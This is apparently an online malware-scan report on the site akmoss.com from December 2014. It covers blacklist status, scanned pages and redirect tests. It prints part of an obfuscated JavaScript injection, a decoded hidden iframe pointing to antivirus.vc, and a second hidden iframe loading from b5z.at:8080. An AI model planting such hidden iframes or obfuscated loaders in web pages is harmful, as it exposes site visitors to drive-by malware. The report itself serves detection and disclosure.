Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=akmoss.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://akmoss.com/ | 200 OK Content-Length: 7739 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function c268fb268di49d35ba81baad(i49d35ba81be94){ return (parseInt(i49d35ba81be94,16));}function i49d35ba81ca4d(i49d35ba81ce34){ var i49d35ba81d21c='';i49d35ba81e1b8=String.fromCharCode;for(i49d35ba81d5ff=0;i49d35ba81d5ff<i49d35ba81ce34.length;i49d35ba81d5ff+=2){ i49d35ba81d21c+=(i49d35ba81e1b8(c268fb268di49d35ba81baad(i49d35ba81ce34.substr(i49d35ba81d5ff,2))));}return i49d35ba81d21c;} var rba='';var i49d35ba81e5a1='3C7'+rba+'3637'+rba+'2697'+rba+'07'+rba+'43E696628216D7'+rba+'96961297'+rb Decoded script: <iframe name=c26 src='http://antivirus.vc/?'+Math.round(Math.random()*141750)+'a6d35990' width=350 height=405 style='visibility:hidden'></iframe> Antivirus reports:
Hidden iFrame found. size: 163x177 style: hidden src: http://b5z.at:8080/index.php <iframe src="http://b5z.at:8080/index.php" width=163 height=177 style="visibility: hidden"> | ||
http://akmoss.com/test404page.js | 404 Not Found Content-Length: 288 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: akmoss.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Dec 2014 19:24:23 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch mod_perl/1.30
Content-Type: text/html
GET / HTTP/1.1
Host: akmoss.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Dec 2014 19:24:23 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch mod_perl/1.30
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: akmoss.com
Referer: http://www.google.com/search?q=akmoss.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: akmoss.com
Referer: http://www.google.com/search?q=akmoss.com
Result:
The result is similar to the first query. There are no suspicious redirects found.